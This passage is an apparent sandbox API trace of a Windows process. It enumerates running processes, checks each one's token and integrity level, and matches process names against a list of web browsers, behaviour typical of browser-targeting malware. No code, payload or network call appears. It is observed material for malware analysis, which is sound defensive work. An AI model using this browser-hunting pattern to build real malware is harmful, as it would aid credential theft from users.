TokenInformation=0x43c708, ReturnLength=0x260fcb4) returned 1 [0325.649] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x260fce4, TokenInformationLength=0x4, ReturnLength=0x260fcc8 | out: TokenInformation=0x260fce4, ReturnLength=0x260fcc8) returned 1 [0325.649] CloseHandle (hObject=0xb8) returned 1 [0325.650] CloseHandle (hObject=0xb4) returned 1 [0325.650] GetLengthSid (pSid=0x43c710*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0325.650] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x558) returned 0xb4 [0325.650] GetVersionExW (in: lpVersionInformation=0x260fbb8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x96920, dwBuildNumber=0x8600e462, dwPlatformId=0x4af890, szCSDVersion="\x01") | out: lpVersionInformation=0x260fbb8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0325.650] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x260fce4 | out: TokenHandle=0x260fce4*=0xb8) returned 1 [0325.650] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x260fce0 | out: TokenInformation=0x0, ReturnLength=0x260fce0) returned 0 [0325.650] GetLastError () returned 0x7a [0325.650] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x43cc18, TokenInformationLength=0x14, ReturnLength=0x260fce0 | out: TokenInformation=0x43cc18, ReturnLength=0x260fce0) returned 1 [0325.651] GetSidSubAuthorityCount (pSid=0x43cc20*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x43cc21 [0325.651] GetSidSubAuthority (pSid=0x43cc20*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x43cc28 [0325.651] CloseHandle (hObject=0xb8) returned 1 [0325.651] CloseHandle (hObject=0xb4) returned 1 [0325.652] lstrcmpiW (lpString1="firefox.exe", lpString2="dwm.exe") returned 1 [0325.652] lstrcmpiW (lpString1="chrome.exe", lpString2="dwm.exe") returned -1 [0325.652] lstrcmpiW (lpString1="opera.exe", lpString2="dwm.exe") returned 1 [0325.652] lstrcmpiW (lpString1="iexplore.exe", lpString2="dwm.exe") returned 1 [0325.652] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="dwm.exe") returned 1 [0325.652] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="dwm.exe") returned 1 [0325.652] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x570) returned 0xb4 [0325.652] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x260fccc | out: TokenHandle=0x260fccc*=0xb8) returned 1 [0325.652] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x260fcb4 | out: TokenInformation=0x0, ReturnLength=0x260fcb4) returned 0 [0325.652] GetLastError () returned 0x7a [0325.652] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x43c708, TokenInformationLength=0x24, ReturnLength=0x260fcb4 | out: TokenInformation=0x43c708, ReturnLength=0x260fcb4) returned 1 [0325.652] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x260fce4, TokenInformationLength=0x4, ReturnLength=0x260fcc8 | out: TokenInformation=0x260fce4, ReturnLength=0x260fcc8) returned 1 [0325.653] CloseHandle (hObject=0xb8) returned 1 [0325.653] CloseHandle (hObject=0xb4) returned 1 [0325.653] GetLengthSid (pSid=0x43c710*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0325.653] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x570) returned 0xb4 [0325.653] GetVersionExW (in: lpVersionInformation=0x260fbb8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x97020, dwBuildNumber=0x8600e462, dwPlatformId=0x4af890, szCSDVersion="\x01") | out: lpVersionInformation=0x260fbb8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0325.653] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x260fce4 | out: TokenHandle=0x260fce4*=0xb8) returned 1 [0325.653] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x260fce0 | out: TokenInformation=0x0, ReturnLength=0x260fce0) returned 0 [0325.653] GetLastError () returned 0x7a [0325.654] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x43cc18, TokenInformationLength=0x14, ReturnLength=0x260fce0 | out: TokenInformation=0x43cc18, ReturnLength=0x260fce0) returned 1 [0325.654] GetSidSubAuthorityCount (pSid=0x43cc20*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x43cc21 [0325.654] GetSidSubAuthority (pSid=0x43cc20*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x43cc28 [0325.654] CloseHandle (hObject=0xb8) returned 1 [0325.654] CloseHandle (hObject=0xb4) returned 1 [0325.655] lstrcmpiW (lpString1="firefox.exe", lpString2="explorer.exe") returned 1 [0325.655] lstrcmpiW (lpString1="chrome.exe", lpString2="explorer.exe") returned -1 [0325.655] lstrcmpiW (lpString1="opera.exe", lpString2="explorer.exe") returned 1 [0325.655] lstrcmpiW (lpString1="iexplore.exe", lpString2="explorer.exe") returned 1 [0325.655] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="explorer.exe") returned 1 [0325.655] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="explorer.exe") returned 1 [0325.655] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0 [0325.655] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0xb4 [0325.655] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x260fccc | out: TokenHandle=0x260fccc*=0xb8) returned 1 [0325.655] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x260fcb4 | out: TokenInformation=0x0, ReturnLength=0x260fcb4) returned 0 [0325.655] GetLastError () returned 0x7a [0325.656] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x43c708, TokenInformationLength=0x24, ReturnLength=0x260fcb4 | out: TokenInformation=0x43c708, ReturnLength=0x260fcb4) returned 1 [0325.656] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x260fce4, TokenInformationLength=0x4, ReturnLength=0x260fcc8 | out: TokenInformation=0x260fce4, ReturnLength=0x260fcc8) returned 1 [0325.656] CloseHandle (hObject=0xb8) returned 1 [0325.656] CloseHandle (hObject=0xb4) returned 1 [0325.656] GetLengthSid (pSid=0x43c710*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0325.656] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0xb4 [0325.656] GetVersionExW (in: lpVersionInformation=0x260fbb8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x97928, dwBuildNumber=0x8600e462, dwPlatformId=0x4af890, szCSDVersion="\x01") | out: lpVersionInformation=0x260fbb8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0325.656] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x260fce4 | out: TokenHandle=0x260fce4*=0xb8) returned 1 [0325.656] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x260fce0 | out: TokenInformation=0x0, ReturnLength=0x260fce0) returned 0 [0325.657] GetLastError () returned 0x7a [0325.657] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x43cc18, TokenInformationLength=0x14, ReturnLength=0x260fce0 | out: TokenInformation=0x43cc18, ReturnLength=0x260fce0) returned 1 [0325.657] GetSidSubAuthorityCount (pSid=0x43cc20*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x43cc21 [0325.657] GetSidSubAuthority (pSid=0x43cc20*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x43cc28 [0325.657] CloseHandle (hObject=0xb8) returned 1 [0325.657] CloseHandle (hObject=0xb4) returned 1 [0325.658] lstrcmpiW (lpString1="firefox.exe", lpString2="ONENOTEM.EXE") returned -1 [0325.658] lstrcmpiW (lpString1="chrome.exe", lpString2="ONENOTEM.EXE") returned -1 [0325.658] lstrcmpiW (lpString1="opera.exe", lpString2="ONENOTEM.EXE") returned 1 [0325.658] lstrcmpiW (lpString1="iexplore.exe", lpString2="ONENOTEM.EXE") returned -1 [0325.658] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="ONENOTEM.EXE") returned -1 [0325.658] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="ONENOTEM.EXE") returned -1 [0325.658] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6fc) returned 0xb4 [0325.659] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x260fccc | out: TokenHandle=0x260fccc*=0xb8) returned 1 [0325.659] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x260fcb4 | out: TokenInformation=0x0, ReturnLength=0x260fcb4) returned 0 [0325.659] GetLastError () returned 0x7a [0325.659] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x43c708, TokenInformationLength=0x24, ReturnLength=0x260fcb4 | out: TokenInformation=0x43c708, ReturnLength=0x260fcb4) returned 1 [0325.659] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x260fce4, TokenInformationLength=0x4, ReturnLength=0x260fcc8 | out: TokenInformation=0x260fce4, ReturnLength=0x260fcc8) returned 1 [0325.659] CloseHandle (hObject=0xb8) returned 1 [0325.659] CloseHandle (hObject=0xb4) returned 1 [0325.659] GetLengthSid (pSid=0x43c710*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0325.659] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6fc) returned 0xb4 [0325.660] GetVersionExW (in: lpVersionInformation=0x260fbb8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x97cd0, dwBuildNumber=0x8600e462, dwPlatformId=0x4af890, szCSDVersion="\x01") | out: lpVersionInformation=0x260fbb8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0325.660] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x260fce4 | out: TokenHandle=0x260fce4*=0xb8) returned 1 [0325.660] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x260fce0 | out: TokenInformation=0x0, ReturnLength=0x260fce0) returned 0 [0325.660] GetLastError () returned 0x7a [0325.660] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x43cc18, TokenInformationLength=0x14, ReturnLength=0x260fce0 | out: TokenInformation=0x43cc18, ReturnLength=0x260fce0) returned 1 [0325.660] GetSidSubAuthorityCount (pSid=0x43cc20*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x43cc21 [0325.660] GetSidSubAuthority (pSid=0x43cc20*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x43cc28 [0325.660] CloseHandle (hObject=0xb8) returned 1 [0325.660] CloseHandle (hObject=0xb4) returned 1 [0325.661] lstrcmpiW (lpString1="firefox.exe", lpString2="reader_sl.exe") returned -1 [0325.661] lstrcmpiW (lpString1="chrome.exe", lpString2="reader_sl.exe") returned -1 [0325.661] lstrcmpiW (lpString1="opera.exe", lpString2="reader_sl.exe") returned -1 [0325.661] lstrcmpiW (lpString1="iexplore.exe", lpString2="reader_sl.exe") returned -1 [0325.661] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="reader_sl.exe") returned -1 [0325.661] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="reader_sl.exe") returned -1 [0325.662] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xb4 [0325.662] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x260fccc | out: TokenHandle=0x260fccc*=0xb8) returned 1 [0325.662] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x260fcb4 | out: TokenInformation=0x0, ReturnLength=0x260fcb4) returned 0 [0325.662] GetLastError () returned 0x7a [0325.662] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x43c708, TokenInformationLength=0x24, ReturnLength=0x260fcb4 | out: TokenInformation=0x43c708, ReturnLength=0x260fcb4) returned 1 [0325.662] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x260fce4, TokenInformationLength=0x4, ReturnLength=0x260fcc8 | out: TokenInformation=0x260fce4, ReturnLength=0x260fcc8) returned 1 [0325.662] CloseHandle (hObject=0xb8) returned 1 [0325.662] CloseHandle (hObject=0xb4) returned 1 [0325.662] GetLengthSid (pSid=0x43c710*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0325.663] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xb4 [0325.663] GetVersionExW (in: lpVersionInformation=0x260fbb8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x97e68, dwBuildNumber=0x8600e462, dwPlatformId=0x4af890, szCSDVersion="\x01") | out: lpVersionInformation=0x260fbb8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0325.663] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x260fce4 | out: TokenHandle=0x260fce4*=0xb8) returned 1 [0325.663] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x260fce0 | out: TokenInformation=0x0, ReturnLength=0x260fce0) returned 0 [0325.663] GetLastError () returned 0x7a [0325.663] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x43cc18, TokenInformationLength=0x14, ReturnLength=0x260fce0 | out: TokenInformation=0x43cc18, ReturnLength=0x260fce0) returned 1 [0325.663] GetSidSubAuthorityCount (pSid=0x43cc20*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x43cc21 [0325.663] GetSidSubAuthority (pSid=0x43cc20*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x43cc28 [0325.663] CloseHandle (hObject=0xb8) returned 1 [0325.663] CloseHandle (hObject=0xb4) returned 1 [0325.664] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0325.664] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0325.664] lstrcmpiW (lpString1="opera.exe", lpString2="svchost.exe") returned -1 [0325.664] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0325.664] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="svchost.exe") returned -1 [0325.664] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="svchost.exe") returned -1 [0325.664] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x594) returned 0xb4 [0325.665] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x260fccc | out: TokenHandle=0x260fccc*=0xb8) returned 1 [0325.665] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x260fcb4 | out: TokenInformation=0x0, ReturnLength=0x260fcb4) returned 0 [0325.665] GetLastError () returned 0x7a [0325.665] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x43c708, TokenInformationLength=0x24, ReturnLength=0x260fcb4 | out: TokenInformation=0x43c708, ReturnLength=0x260fcb4) returned 1 [0325.665] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x260fce4, TokenInformationLength=0x4, ReturnLength=0x260fcc8 | out: TokenInformation=0x260fce4, ReturnLength=0x260fcc8) returned 1 [0325.665] CloseHandle (hObject=0xb8) returned 1 [0325.665] CloseHandle (hObject=0xb4) returned 1 [0325.665] GetLengthSid (pSid=0x43c710*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0325.665] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x594) returned 0xb4 [0325.666] GetVersionExW (in: lpVersionInformation=0x260fbb8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x98380, dwBuildNumber=0x8600e462, dwPlatformId=0x4af890, szCSDVersion="\x01") | out: lpVersionInformation=0x260fbb8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0325.666] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x260fce4 | out: TokenHandle=0x260fce4*=0xb8) returned 1 [0325.666] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x260fce0 | out: TokenInformation=0x0, ReturnLength=0x260fce0) returned 0 [0325.666] GetLastError () returned 0x7a [0325.666] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x43cc18, TokenInformationLength=0x14, ReturnLength=0x260fce0 | out: TokenInformation=0x43cc18, ReturnLength=0x260fce0) returned 1 [0325.666] GetSidSubAuthorityCount (pSid=0x43cc20*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x43cc21 [0325.666] GetSidSubAuthority (pSid=0x43cc20*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x43cc28 [0325.666] CloseHandle (hObject=0xb8) returned 1 [0325.666] CloseHandle (hObject=0xb4) returned 1 [0325.667] lstrcmpiW (lpString1="firefox.exe", lpString2="upde25b4796.exe") returned -1 [0325.667] lstrcmpiW (lpString1="chrome.exe", lpString2="upde25b4796.exe") returned -1 [0325.667] lstrcmpiW (lpString1="opera.exe", lpString2="upde25b4796.exe") returned -1 [0325.667] lstrcmpiW (lpString1="iexplore.exe", lpString2="upde25b4796.exe") returned -1 [0325.667] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="upde25b4796.exe") returned -1 [0325.667] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="upde25b4796.exe") returned -1 [0325.667] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x57c) returned 0x0 [0325.667] VirtualFree (lpAddress=0x90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0325.668] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x7d0) returned 0x102 [0327.670] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x260fd04 | out: SystemInformation=0x0, ResultLength=0x260fd04*=0xaf50) returned 0xc0000004 [0327.670] VirtualAlloc (lpAddress=0x0, dwSize=0xbf50, flAllocationType=0x1000, flProtect=0x4) returned 0x90000 [0327.671] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x90000, Length=0xbf50, ResultLength=0x0 | out: SystemInformation=0x90000, ResultLength=0x0) returned 0x0 [0327.672] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0327.672] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0327.672] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0327.672] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0327.672] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0327.672] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x184) returned 0x0 [0327.672] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1ac) returned 0x0 [0327.672] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d8) returned 0x0 [0327.672] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e0) returned 0x0 [0327.673] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e8) returned 0x0 [0327.673] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0327.673] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x294) returned 0x0 [0327.673] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c4) returned 0x0 [0327.673] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x32c) returned 0x0 [0327.673] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x358) returned 0x0 [0327.673] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x39c) returned 0x0 [0327.673] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3e8) returned 0x0 [0327.673] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0 [0327.674] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x304) returned 0x0 [0327.674] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x43c) returned 0x0 [0327.674] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4c8) returned 0xb4 [0327.674] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x260fccc | out: TokenHandle=0x260fccc*=0xb8) returned 1 [0327.674] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x260fcb4 | out: TokenInformation=0x0, ReturnLength=0x260fcb4) returned 0 [0327.674] GetLastError () returned 0x7a [0327.674] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x43c708, TokenInformationLength=0x24, ReturnLength=0x260fcb4 | out: TokenInformation=0x43c708, ReturnLength=0x260fcb4) returned 1 [0327.674] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x260fce4, TokenInformationLength=0x4, ReturnLength=0x260fcc8 | out: TokenInformation=0x260fce4, ReturnLength=0x260fcc8) returned 1 [0327.674] CloseHandle (hObject=0xb8) returned 1 [0327.675] CloseHandle (hObject=0xb4) returned 1 [0327.675] GetLengthSid (pSid=0x43c710*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0327.675] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4c8) returned 0xb4 [0327.675] GetVersionExW (in: lpVersionInformation=0x260fbb8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x98760, dwBuildNumber=0x8600e462, dwPlatformId=0x4af890, szCSDVersion="\x01") | out: lpVersionInformation=0x260fbb8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0327.675] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x260fce4 | out: TokenHandle=0x260fce4*=0xb8) returned 1 [0327.675] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x260fce0 | out: TokenInformation=0x0, ReturnLength=0x260fce0) returned 0 [0327.675] GetLastError () returned 0x7a [0327.675] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x43cc18, TokenInformationLength=0x14, ReturnLength=0x260fce0 | out: TokenInformation=0x43cc18, ReturnLength=0x260fce0) returned 1 [0327.676] GetSidSubAuthorityCount (pSid=0x43cc20*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x43cc21 [0327.676] GetSidSubAuthority (pSid=0x43cc20*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x43cc28 [0327.676] CloseHandle (hObject=0xb8) returned 1 [0327.676] CloseHandle (hObject=0xb4) returned 1 [0327.676] lstrcmpiW (lpString1="firefox.exe", lpString2="taskhost.exe") returned -1 [0327.676] lstrcmpiW (lpString1="chrome.exe", lpString2="taskhost.exe") returned -1 [0327.676] lstrcmpiW (lpString1="opera.exe", lpString2="taskhost.exe") returned -1 [0327.676] lstrcmpiW 